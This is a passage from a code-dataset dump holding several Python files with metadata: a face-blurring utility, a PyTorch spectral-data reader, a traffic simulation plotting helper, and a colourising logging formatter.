os\nimport cv2\nimport numpy as np\nimport torch\n\nvisual_debug = False\n\n\ndef get_face_parser_model(model_type: str = 'bisenet') -> Any:\n \"\"\"\n This function sets the model during the start and get the session for continuous inference in the later process\n\n :param model_type: Name of the model, i.e., face parsing model is bisenet by default, defaults to 'bisenet'\n :type model_type: str, optional\n :return: returns the model net for the given model type. It is usually Bisenet in this case\n :rtype: Any\n \"\"\"\n dev_acc = 'cuda' if torch.cuda.is_available() else 'cpu'\n net = init_parsing_model(model_name=model_type, device=dev_acc,\n model_rootpath=os.path.join(os.path.expanduser('~'), '.iveu'))\n\n return net, dev_acc\n\n\ndef enable_visual_debug_fb(enable: bool) -> None:\n \"\"\"\n This function invokes the visual debug infomration to be stored or not as image files.\n\n :param enable: It activates the visual debugging for testin purpose.\n :type enable: bool\n \"\"\"\n global visual_debug\n visual_debug = enable\n if (visual_debug is True):\n if not os.path.exists('debug'):\n os.makedirs('debug')\n\n\ndef overlay_blurred_face(base_img: Any, face_blur_img: Any, mask: Any) -> Any:\n \"\"\"\n It merges the background and the forground based on the orignal, face blurred and mask image.\n\n :param base_img: This image is the original image to be processed\n :type base_img: Any\n :param face_blur_img: This is the blurred input image\n :type face_blur_img: Any\n :param mask: This image is the mask image that holds the face mask\n :type mask: Any\n :return: It returns the merged image\n :rtype: Any\n \"\"\"\n global visual_debug\n\n fg_img = cv2.bitwise_or(face_blur_img, face_blur_img, mask=mask)\n\n mask_inv = cv2.bitwise_not(mask)\n bg_img = cv2.bitwise_or(base_img, base_img, mask=mask_inv)\n\n overlaid_img = cv2.bitwise_or(fg_img, bg_img)\n\n if (visual_debug is True):\n cv2.imwrite(os.path.join('debug', 'd005_01_foreground_image_mask.png'), mask)\n cv2.imwrite(os.path.join('debug', 'd005_02_foreground_image.png'), fg_img)\n cv2.imwrite(os.path.join('debug', 'd005_03_background_image_mask.png'), mask_inv)\n cv2.imwrite(os.path.join('debug', 'd005_04_background_image.png'), bg_img)\n cv2.imwrite(os.path.join('debug', 'd005_05_output_resized.png'), overlaid_img)\n\n return overlaid_img\n\n\ndef add_face_blur(net: Any, dev_acc: str, in_file_path: str, out_file_path: str,\n blurring_factor: int = 33) -> None:\n \"\"\"\n This function adds the blur to the face using face mask by face parser and blurred input image\n\n :param net: This param holds the reference for the face parser net for inference\n :type net: Any\n :param dev_acc: It holds the cuda support if so for doing inference in the GPU, otherwise in CPU\n :type dev_acc: str\n :param in_file_path: The input file with path that has the face in that image\n :type in_file_path: str\n :param out_file_path: The ouptut path with filename to store the processed face blurred image\n :type out_file_path: str\n :param blurring_factor: The kernal window size for the blurring filter, defaults to 33\n :type blurring_factor: int, optional\n :return: Returns the face blurred image in the Original image resolution\n :rtype: Any\n \"\"\"\n global visual_debug\n\n img_org = cv2.imread(in_file_path)\n height, width = img_org.shape[:2]\n\n img_resized = cv2.resize(img_org, (512, 512), interpolation=cv2.INTER_LINEAR)\n img = img2tensor(img_resized.astype('float32') / 255., bgr2rgb=True, float32=True)\n normalize(img, (0.485, 0.456, 0.406), (0.229, 0.224, 0.225), inplace=True)\n\n if dev_acc == 'cuda':\n img = torch.unsqueeze(img, 0).cuda()\n elif dev_acc == 'cpu':\n img = torch.unsqueeze(img, 0)\n\n with torch.no_grad():\n face_parsed = net(img)[0]\n face_parsed = face_parsed.squeeze(0).cpu().numpy().argmax(0)\n\n mask_face = np.zeros((face_parsed.shape[0], face_parsed.shape[1]), dtype=\"uint8\")\n rep = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 17]\n mask_face = np.where(np.isin(face_parsed, rep), 255, mask_face)\n\n ksize = (blurring_factor, blurring_factor)\n img_input_blur = cv2.blur(img_resized, ksize)\n\n overlaid_img = overlay_blurred_face(img_resized, img_input_blur, mask_face)\n\n final_img = cv2.resize(overlaid_img, (width, height), interpolation=cv2.INTER_LINEAR)\n\n if (visual_debug is True):\n cv2.imwrite(os.path.join('debug', 'd001_input_image.png'), img_org)\n cv2.imwrite(os.path.join('debug', 'd002_input_resized.png'), img_resized)\n cv2.imwrite(os.path.join('debug', 'd003_face_mask.png'), mask_face)\n cv2.imwrite(os.path.join('debug', 'd004_input_blurred.png'), img_input_blur)\n cv2.imwrite(os.path.join('debug', 'd006_final.png'), final_img)\n\n cv2.imwrite(out_file_path, final_img)\n", "repo_name": "makemypoc/image-video-editing-utils", "sub_path": "socialmediautils/blur/face_blur_img.py", "file_name": "face_blur_img.py", "file_ext": "py", "file_size_in_byte": 5307, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.cuda.is_available", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 28, "usage_type": "attribute"}, {"api_name": "facexlib.parsing.init_parsing_model", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.expanduser", "line_number": 30, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 19, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 46, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 49, "usage_type": "name"}, {"api_name": "cv2.bitwise_or", "line_number": 64, "usage_type": "call"}, {"api_name": "cv2.bitwise_not", "line_number": 66, "usage_type": "call"}, {"api_name": "cv2.bitwise_or", "line_number": 67, "usage_type": "call"}, {"api_name": "cv2.bitwise_or", "line_number": 69, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path", "line_number": 75, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path", "line_number": 76, "usage_type": "attribute"}, {"api_name": "typing.Any", "line_number": 81, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 101, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 104, "usage_type": "call"}, {"api_name": "cv2.INTER_LINEAR", "line_number": 104, "usage_type": "attribute"}, {"api_name": "facexlib.utils.misc.img2tensor", "line_number": 105, "usage_type": "call"}, {"api_name": "torchvision.transforms.functional.normalize", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.unsqueeze", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.unsqueeze", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.isin", "line_number": 119, "usage_type": "call"}, {"api_name": "cv2.blur", "line_number": 122, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 126, "usage_type": "call"}, {"api_name": "cv2.INTER_LINEAR", "line_number": 126, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path", "line_number": 129, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 130, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 130, "usage_type": "call"}, {"api_name": "os.path", "line_number": 130, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path", "line_number": 131, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 132, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 132, "usage_type": "call"}, {"api_name": "os.path", "line_number": 132, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 133, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 133, "usage_type": "call"}, {"api_name": "os.path", "line_number": 133, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 135, "usage_type": "call"}]} +{"seq_id": "25329506963", "text": "import sys, os\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\nimport pandas as pd\nimport numpy as np\nfrom scipy import signal\nfrom sklearn.decomposition import PCA\nfrom BaselineRemoval import BaselineRemoval\n\ndef noramlization(data):\n minVals = data.min(0)\n maxVals = data.max(0)\n ranges = maxVals - minVals\n normData = (data - minVals) / ranges\n return normData\n\ndef z_score(data):\n data -= np.mean(data, axis=0)\n data /= np.std(data, axis=0)\n return data\n\n\n# Savitzky-Golay for smoothing with general parameters\ndef SG(data, window_length, polyorder):\n return np.array([signal.savgol_filter(item, window_length, polyorder) for item in data])\n\nclass Datareader(Dataset):\n def __init__(self, filepath \n #,n_components=0.95 \n #,airpls_lambda=50, airpls_porder=1, airpls_itermax=30 \n #,sg_window_length=51, sg_polyorder=5\n ):\n dataframe = pd.read_csv(filepath)\n feature_data = dataframe.iloc[:, :-1].values\n \n # Applying z-score normalization\n feature_data = z_score(feature_data)\n \n # BaseLineRemoval\n\n # Applying BaseLineRemoval\n # feature_data : [n_samples, n_features]\n for i in range(feature_data.shape[1]):\n baseline = BaselineRemoval(feature_data[:, i])\n baseline = baseline.ZhangFit()\n feature_data[:, i] = baseline\n\n # Savitzky-Golay\n\n # Applying Savitzky-Golay smoothing filter with specified parameters\n # feature_data = SG(feature_data, sg_window_length, sg_polyorder)\n \n # Compute positional encoding\n d_model = feature_data.shape[1]\n sequence_length = feature_data.shape[0]\n wavelengths = dataframe.columns[:-1].astype(float).to_numpy()\n wavelength_diffs = np.diff(wavelengths, prepend=wavelengths[0])\n div_term = wavelength_diffs[np.newaxis, :] * -(np.log(10000.0) / d_model)\n position = np.arange(sequence_length)[:, np.newaxis]\n positional_encoding = np.zeros((sequence_length, d_model))\n positional_encoding[:, 0::2] = np.sin(position * div_term[:, 0::2])\n positional_encoding[:, 1::2] = np.cos(position * div_term[:, 1::2])\n\n feature = feature_data + positional_encoding\n\n # Applying PCA for dimensionality reduction if n_components is provided\n # if n_components is not None:\n # pca = PCA(n_components=n_components)\n # feature = pca.fit_transform(feature)\n\n self.data = feature\n \n self.labels = dataframe.iloc[:, -1].values\n \n def __len__(self):\n return len(self.data)\n \n def __getitem__(self, index):\n data_sample = torch.tensor(self.data[index], dtype=torch.float32)\n label = torch.tensor(self.labels[index], dtype=torch.long)\n return data_sample, label\n", "repo_name": "Eziotao-tyd/RSBC", "sub_path": "utils/datareader.py", "file_name": "datareader.py", "file_ext": "py", "file_size_in_byte": 2888, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.mean", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 25, "usage_type": "call"}, {"api_name": "scipy.signal.savgol_filter", "line_number": 25, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.utils.data.Dataset", "line_number": 27, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 33, "usage_type": "call"}, {"api_name": "BaselineRemoval.BaselineRemoval", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 58, "usage_type": "attribute"}, {"api_name": "numpy.log", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 59, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 79, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 80, "usage_type": "attribute"}]} +{"seq_id": "18225873253", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef estimate_flow(pos_grid,N,i,f):\n\n # estimates flow over time between position i and f in the road\n\n flow = []\n L = len(pos_grid[0])\n T = len(pos_grid)\n\n assert (i >= 0 and i <= L-1), \"i out of bound\"\n assert (f >= 0 and f <= L-1), \"f out of bound\"\n\n for row in pos_grid:\n\n temp_array = row[i:f]\n temp_flow = np.sum(temp_array)*(N/(L*T))\n flow.append(temp_flow)\n\n return flow\n\n\n\n\ndef plot_simulation(pos_grid):\n\n fig = plt.figure(figsize=(10,6))\n\n # we add some contrast to the velocity to the background of imshow\n\n for r,row in enumerate(pos_grid):\n for c,col in enumerate(row):\n pos_grid[r][c] += 1\n\n plt.xlabel('Occupation', fontsize = 13)\n plt.ylabel('Time', fontsize = 13)\n plt.title('Simulation')\n plt.legend()\n plt.imshow(pos_grid, cmap='inferno')\n\n return fig\n", "repo_name": "NonAbelianCapu/Traffic_Sim", "sub_path": "src/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 914, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.sum", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}]} +{"seq_id": "39260600010", "text": "# -*- coding: utf8 -*-\n\nfrom __future__ import print_function\nimport logging\nimport re\nimport sys\nimport time\n\nfrom six import (\n binary_type,\n iteritems,\n string_types,\n)\n\n\n__DEBUG__ = False\n\nclass Formatter(logging.Formatter):\n \"\"\"\n Custom LogRecord formatter which handles string.format formatting and\n some custom keywords like '{color}'\n \"\"\"\n\n ENCODING = sys.getfilesystemencoding()\n FORMAT = '%(asctime)s [%(levelname)s][%(process)s]%(ident)s %(message)s'\n FORMAT_NO_DATE = '[%(levelname)s][%(process)s]%(ident)s %(message)s'\n DATEFMT = '%m/%d@%H:%M:%S'\n\n # assumes 256 colors\n # EXCLUDE_COLORS = [0, 256] + list(range(16, 22)) + listrange((232, 245))\n VALID_FG_COLORS = (\n list(range(1, 15+1))\n + list(range(22, 231+1))\n + list(range(245, 256+1))\n )\n _LEVEL_COLORS = {\n logging.DEBUG: (15, 8),\n logging.INFO: (15, None),\n logging.WARNING: (0, 202),\n logging.ERROR: (15, 1),\n logging.CRITICAL: (15, 201),\n }\n\n KEYWORD_REGEX_FMT = r'^\\w*{0}\\w*$'\n # |\\_/\\_/\\_/ \\\n # | | | | match entire string\n # | | | optionally match any trailing words\n # | \\ match keyword (eg. 'color') optionally followed by\n # | optionally match any leading words\n # match entire string\n __REGEXES = {}\n\n __LARGE_TIME_UNITS = [\n ('d', 24*60*60),\n ('h', 60*60),\n ('m', 60),\n ('s', 1),\n ]\n __SMALL_TIME_UNITS =[\n ('ms', 1e-3),\n ('µs', 1e-6),\n ('ns', 1e-9),\n ('ps', 1e-12),\n ]\n __SIZE_UNITS = ['', 'K', 'M', 'G', 'T', 'P', 'E', 'Z']\n\n def __init__(self, fmt=FORMAT, datefmt=DATEFMT):\n logging.Formatter.__init__(self, fmt=fmt, datefmt=datefmt)\n\n def format(self, record):\n try:\n level_colors = self._LEVEL_COLORS[record.levelno]\n except KeyError:\n pass\n else:\n record.levelname = self.color_msg(\n # pad space to the end so that default level names align\n '{0:<{1}}'.format(record.levelname, len('CRITICAL')),\n level_colors[0],\n level_colors[1],\n )\n\n try:\n if record.process:\n record.process = self.get_fg_color_msg(record.process)\n except AttributeError:\n pass\n\n try:\n record.ident = self.get_fg_color_msg(record.ident)\n except AttributeError:\n record.ident = ''\n else:\n record.ident = ' ({0})'.format(record.ident)\n\n def handle_special_keyword(\n keyword, format_func, *func_args, **func_kwargs\n ):\n if keyword not in record.msg:\n # don't process the special keyword if it won't be formatted\n # in anyway\n return None\n\n regex = Formatter.__get_regex(keyword)\n # format all matching keywords in record.kwargs\n keys = [\n m.group(0) for k in record.kwargs.keys()\n for m in [regex.match(k)] if m\n ]\n for k in keys:\n record.kwargs[k] = format_func(\n record.kwargs[k], *func_args, **func_kwargs\n )\n return keys\n\n # Note: most of these keywords are mutually exclusive (unpack is baked\n # into time, size, color, strftime). This mutual exclusion is not\n # enforced, so nothing will break if multiple special keywords are\n # specified but the behavior is probably not what you will want\n # (whatever that may be).\n handle_special_keyword('unpack', self.unpack)\n handle_special_keyword('pprint', self.pprint)\n # XXX: send record.kwargs to strftime so it can try to get the passed-in\n # time instead of using the default current time\n handle_special_keyword('strftime', self.strftime, **record.kwargs)\n handle_special_keyword('time', self.readable_time)\n handle_special_keyword('size', self.readable_size)\n handle_special_keyword('yesno', self.yesno)\n # XXX: handle color last because it alters the text\n handle_special_keyword('color', self.get_fg_color_msg)\n\n # try to handle UnicodeEncodeError on string.format in py2.\n # (this is extraneous work in python3)\n encoded_args = []\n encoded_kwargs = {}\n for arg in record.args:\n encoded_args.append(Formatter.__stringify(arg))\n for key, val in iteritems(record.kwargs):\n encoded_kwargs[key] = Formatter.__stringify(val)\n\n msg = Formatter.__stringify(record.msg)\n try:\n record.msg = msg.format(*encoded_args, **encoded_kwargs)\n except (IndexError, KeyError, ValueError):\n # missing string.format arguments:\n # could be a typo or the msg could just contain '{}'\n # or mixing '{0} {}' formatting\n escaped_msg = Formatter.__handle_bad_msg(\n msg, record.args, record.kwargs,\n )\n try:\n record.msg = escaped_msg.format(*encoded_args, **encoded_kwargs)\n\n except Exception as e:\n import traceback\n # failed to catch some edge-case in __handle_bad_msg\n # (could be missing format_spec info eg. '{0:{}}')\n print(\n 'Could not format \\'{msg}\\''\n '\\nargs: {args}'\n '\\nkwargs: {kwargs}'.format(\n msg=escaped_msg,\n args=record.args,\n kwargs=record.kwargs,\n )\n )\n try:\n trace = traceback.format_exc()\n except KeyError as key_err:\n # failed get traceback ..\n print(\n 'Failed to print traceback ({type}: {err})'.format(\n type='.'.join([\n key_err.__module__,\n key_err.__class__.__name__,\n ]),\n err=key_err.message,\n )\n )\n else:\n print(trace)\n\n return ''\n\n # clear the args so that the base format() call doesn't complain about\n # missing arguments\n record.args = tuple() # TODO: pop only used arguments\n formatted_msg = logging.Formatter.format(self, record)\n\n return formatted_msg\n\n @staticmethod\n def __get_regex(keyword, ptn=KEYWORD_REGEX_FMT):\n try:\n regex = Formatter.__REGEXES[keyword]\n except KeyError:\n if ptn == Formatter.KEYWORD_REGEX_FMT:\n ptn = ptn.format(keyword)\n regex = re.compile(ptn)\n Formatter.__REGEXES[keyword] = regex\n return regex\n\n @staticmethod\n def __handle_bad_msg(msg, args, kwargs):\n \"\"\"\n Handles any missing args/keywords in the format message string\n \"\"\"\n try:\n str_formatter = Formatter.__STR_FORMATTER\n except AttributeError:\n import string\n str_formatter = string.Formatter()\n Formatter.__STR_FORMATTER = str_formatter\n\n def do_replace(field='', spec=''):\n if spec and not spec.startswith(':'):\n spec = ':' + spec\n ptn = ''.join([\n '(\\{',\n # escape in case '{}' appears in either\n # (eg. '>{1}' in regex means repeat '>' once)\n re.escape(str(field)),\n re.escape(str(spec)),\n '\\})'\n ])\n if __DEBUG__:\n print('enclosing:', ptn, 'with {}')\n return re.sub(ptn, r'{\\1}', msg)\n\n auto = []\n auto_children = []\n # map the order auto fields appear in case there are not enough args\n # (we cannot simply replace '{}' from the end in case of '{:{}}')\n auto_mapping = {}\n manual = []\n manual_children = []\n keyword_children = []\n def handle_field(field, format_spec='', parent=None):\n if field is not None:\n if not field:\n # {}\n data = None\n if not parent:\n auto.append( (field, format_spec) )\n data = (auto, len(auto)-1)\n else:\n auto_children.append( (field, format_spec) )\n data = (auto_children, len(auto_children)-1)\n auto_mapping[len(auto_mapping)] = data\n\n elif field.isdigit():\n # {69}\n # store all manual fields in case an auto field exists\n if not parent:\n manual.append( (int(field), format_spec) )\n else:\n manual_children.append( (int(field), format_spec) )\n\n elif field not in kwargs:\n # {foo}\n if not parent:\n # root-level field, just replace\n return do_replace(field, format_spec)\n else:\n # probably a format_spec or otherwise not at root-level\n # don't replace yet in case we need this field to format\n # a root-level field later\n keyword_children.append( (field, format_spec) )\n return msg\n\n # https://stackoverflow.com/a/37577590\n # https://hg.python.org/cpython/file/2.7/Lib/string.py#l634\n for text, field, format_spec, conversion in str_formatter.parse(msg):\n msg = handle_field(field, format_spec)\n\n # check if the format spec contains a format string\n # TODO: recursion required? I think it's theoretically possible\n # for an unbounded chain of format strings in format_specs but\n # why would someone do that ...?\n if isinstance(format_spec, string_types):\n for _, spec_field, _, _ in str_formatter.parse(format_spec):\n msg = handle_field(spec_field, parent=field)\n\n if __DEBUG__:\n print('->', msg, end='\\n\\n')\n\n num_auto = len(auto_mapping)\n num_manual = len(manual) + len(manual_children)\n if num_auto > 0 and num_manual > 0:\n # cannot mix '{}' and '{0}'\n for field, spec in auto:\n msg = do_replace(field, spec)\n for field, spec in manual:\n msg = do_replace(field, spec)\n # replace children after so that root-level replacements behave\n # properly\n # -- the underlying issue is if do_replace is called on the \"child\"\n # elements first, then the \"parent\" elements will not substitute\n # properly since the child was changed\n for field, spec in auto_children:\n msg = do_replace(field, spec)\n for field, spec in manual_children:\n msg = do_replace(field, spec)\n\n else:\n if num_auto > 0:\n # too many '{}' fields\n\n # XXX: this is not perfect; it doesn't handle eg. '{:{}}' well\n for i in reversed(sorted(auto_mapping.keys())):\n if len(args) <= i:\n _list, idx = auto_mapping[i]\n field, spec = _list[idx]\n msg = do_replace(field, spec)\n\n# def rreplace(old, new, num):\n# \"\"\"\n# replace last `num` occurrences of `old` with `new` in message\n\n# https://stackoverflow.com/a/2556252\n# \"\"\"\n# split = msg.rsplit(old, num)\n# return new.join(split)\n# msg = rreplace(r'{}', '{{}}', len(auto) - len(args))\n\n elif num_manual > 0:\n for field, spec in manual:\n if len(args) <= field:\n msg = do_replace(field, spec)\n for field, spec in manual_children:\n if len(args) <= field:\n msg = do_replace(field, spec)\n\n # format any missing \"child\" fields eg. '{bar}' in '{foo:{bar}}'\n for field, spec in keyword_children:\n msg = do_replace(field, spec)\n\n return msg\n\n @staticmethod\n def __encode(msg, encoding=ENCODING):\n if sys.version_info.major < 3:\n if isinstance(msg, unicode):\n return msg.encode(encoding, 'replace')\n return msg\n\n @staticmethod\n def __decode(msg, encoding=ENCODING):\n try:\n if isinstance(msg, binary_type):\n return msg.decode(encoding, 'replace')\n except AttributeError:\n pass\n return msg\n\n @staticmethod\n def __stringify(msg):\n if not isinstance(msg, string_types):\n msg = str(msg)\n else:\n msg = Formatter.__encode(msg)\n return msg\n\n @staticmethod\n def __choose_color(color_dict, msg, valid):\n \"\"\"\n Chooses a persistent color for the given msg\n \"\"\"\n import random\n msg = Formatter.__stringify(msg)\n try:\n msg_color = color_dict[msg][0]\n except KeyError:\n msg_color = random.choice(valid)\n finally:\n color_dict[msg] = (msg_color, time.time())\n\n # free up memory so that colorized strings that appear infrequently\n # aren't needlessly holding onto it\n num_pruned = 0\n EXPIRE_THRESHOLD = 3 * 60 * 60\n to_prune = [\n msg for msg in color_dict.keys()\n # elapsed > EXPIRE => hasn't been used in a while\n if time.time() - color_dict[msg][1] > EXPIRE_THRESHOLD\n ]\n for msg in to_prune:\n if __DEBUG__:\n print('Pruning colorized message: \\'{msg}\\' ...'.format(\n msg=msg\n ))\n del color_dict[msg]\n num_pruned += 1\n if __DEBUG__ and num_pruned > 0:\n print('Pruned #{num} colorized message{plural}'.format(\n num=num_pruned,\n plural=('' if num_pruned == 1 else 's'),\n ))\n\n return msg_color\n\n @staticmethod\n def color_fg(msg, valid=VALID_FG_COLORS):\n \"\"\"\n Chooses a color to use for the foreground\n \"\"\"\n try:\n fg_colors = Formatter.__colors_foreground\n except AttributeError:\n fg_colors = {}\n Formatter.__colors_foreground = fg_colors\n return Formatter.__choose_color(fg_colors, msg, valid)\n\n @staticmethod\n def color_bg(msg, valid=range(0, 256+1)):\n \"\"\"\n Chooses a color to use for the background\n \"\"\"\n try:\n bg_colors = Formatter.__colors_background\n except AttributeError:\n bg_colors = {}\n Formatter.__colors_background = bg_colors\n return Formatter.__choose_color(bg_colors, msg, valid)\n\n @staticmethod\n def color_msg(msg, fg, bg=None):\n \"\"\"\n Returns the color-formatted {msg} string\n \"\"\"\n full_msg = ['\\033[38;5;{0}'.format(fg)]\n if bg:\n full_msg.append(';48;5;{0}'.format(bg))\n full_msg.append('m{0}\\033[m'.format(Formatter.__stringify(msg)))\n return ''.join(full_msg)\n\n @staticmethod\n def get_fg_color_msg(msg):\n \"\"\"\n Chooses a foreground color for {msg} and returns the color-formatted\n string\n \"\"\"\n def get_color(msg):\n return Formatter.color_msg(msg, Formatter.color_fg(msg))\n\n return Formatter.unpack(msg, get_color)\n\n @staticmethod\n def unpack(seq, func=lambda e: e, *func_args, **func_kwargs):\n \"\"\"\n Unpacks the {seq}, applying {func} on each element. If {seq} is a dict,\n this will only unpack the keys.\n \"\"\"\n if hasattr(seq, '__iter__') and not isinstance(seq, string_types):\n return ', '.join([\n func(element, *func_args, **func_kwargs)\n for element in seq\n ])\n return func(seq, *func_args, **func_kwargs)\n\n @staticmethod\n def __readable_time(seconds):\n \"\"\"\n Formats {seconds} into a human readable string\n \"\"\"\n try:\n seconds = float(seconds)\n except (ValueError, TypeError):\n return seconds\n\n if seconds == 0:\n return '00s'\n\n is_negative = seconds < 0\n seconds = abs(seconds)\n\n time_parts = {}\n def split_time(seconds, UNITS):\n for unit, div in UNITS:\n time_parts[unit] = int(seconds / div)\n if time_parts[unit] > 0:\n seconds -= (time_parts[unit] * div)\n\n # construct human readable string format, skipping parts that are 0\n # '{d}d{h}h{m}m{s}s'\n fmt = [\n '{{{0}:02d}}{0}'.format(u)\n for u, _ in UNITS if time_parts[u] > 0\n ]\n return ''.join(fmt)\n\n fmt = split_time(seconds, Formatter.__LARGE_TIME_UNITS)\n if not fmt:\n fmt = split_time(seconds, Formatter.__SMALL_TIME_UNITS)\n\n if is_negative:\n fmt = '{0}{1}'.format('-', fmt)\n\n return fmt.format(**time_parts)\n\n @staticmethod\n def readable_time(seconds):\n return Formatter.unpack(seconds, Formatter.__readable_time)\n\n @staticmethod\n def __readable_size(size, suffix='B'):\n \"\"\"\n Formats {size} into a human readable string\n \"\"\"\n try:\n size = float(size)\n except (ValueError, TypeError):\n return size\n\n prefix = 'Y'\n for unit in Formatter.__SIZE_UNITS:\n if abs(size) < float(2**10):\n prefix = unit\n break\n size /= float(2**10)\n return '{0:3.2f} {1}{2}'.format(size, prefix, suffix)\n\n @staticmethod\n def readable_size(size, suffix='B'):\n return Formatter.unpack(size, Formatter.__readable_size, suffix=suffix)\n\n @staticmethod\n def yesno(value):\n return 'yes' if bool(value) else 'no'\n\n @staticmethod\n def pprint(thing):\n import pprint\n return pprint.pformat(thing)\n\n @staticmethod\n def __strftime(fmt, **kwargs):\n import time\n\n try:\n # special extra key: {strf_time} to use instead of current time\n time_val = kwargs['strf_time']\n except KeyError:\n # no strf_time key specified\n pass\n else:\n try:\n # try to use the specified time\n return time.strftime(fmt, time_val)\n except TypeError:\n # Tuple or struct_time argument required\n try:\n # try to convert it\n return time.strftime(fmt, time.localtime(time_val))\n except TypeError:\n # bad time_val (not integer/float)\n pass\n\n # everything failed, just return the current time\n return time.strftime(fmt)\n\n @staticmethod\n def strftime(fmt, **kwargs):\n return Formatter.unpack(fmt, Formatter.__strftime, **kwargs)\n\nclass NoColorFormatter(Formatter):\n \"\"\"\n Color-less logging formatter\n \"\"\"\n\n @staticmethod\n def color_msg(msg, *args, **kwargs):\n return msg\n\n @staticmethod\n def get_fg_color_msg(msg, *args, **kwargs):\n return Formatter.unpack(msg)\n\n\n__all__ = [\n 'Formatter',\n 'NoColorFormatter',\n]\n\n", "repo_name": "lv10wizard/ig-highlights-bot", "sub_path": "src/util/logger/formatter.py", "file_name": "formatter.py", "file_ext": "py", "file_size_in_byte": 20149, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.Formatter", "line_number": 18, "usage_type": "attribute"}, {"api_name": "sys.getfilesystemencoding", "line_number": 24, "usage_type": "call"}, {"api_name": "logging.DEBUG", 